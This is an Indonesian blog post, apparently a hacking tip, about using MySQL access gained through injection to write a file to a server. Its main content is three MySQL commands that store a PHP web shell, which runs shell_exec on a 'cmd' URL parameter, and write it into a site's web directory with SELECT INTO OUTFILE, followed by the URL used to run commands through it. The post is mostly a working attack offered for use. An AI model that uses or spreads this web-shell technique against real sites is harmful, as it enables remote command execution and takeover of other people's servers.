Cerita jadul : Membuat file dengan Mysql [injection]

kalo udah bisa masuk, masukkan kode untuk membuat file

mysql> CREATE TABLE crap (codetab text);
Query OK, 0 rows affected (0.01 sec)

mysql> INSERT INTO crap (codetab) values ('<? $out =
shell_exec($_GET["cmd"]." 2>&1"); echo "<pre>$out</pre>"; ?>');
Query OK, 1 row affected (0.00 sec)

mysql>  SELECT * INTO OUTFILE '/var/www/situsnya/cmd.php' from crap;
Query OK, 1 row affected (0.00 sec)

nah sekarang bisa mengakses file tersebut lewat 
http:// situs.tld/cmd.php?cmd=dir

Tinggalkan komentar

Belum ada komentar.

Comments RSS TrackBack Identifier URI

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

  • follow @fatah7f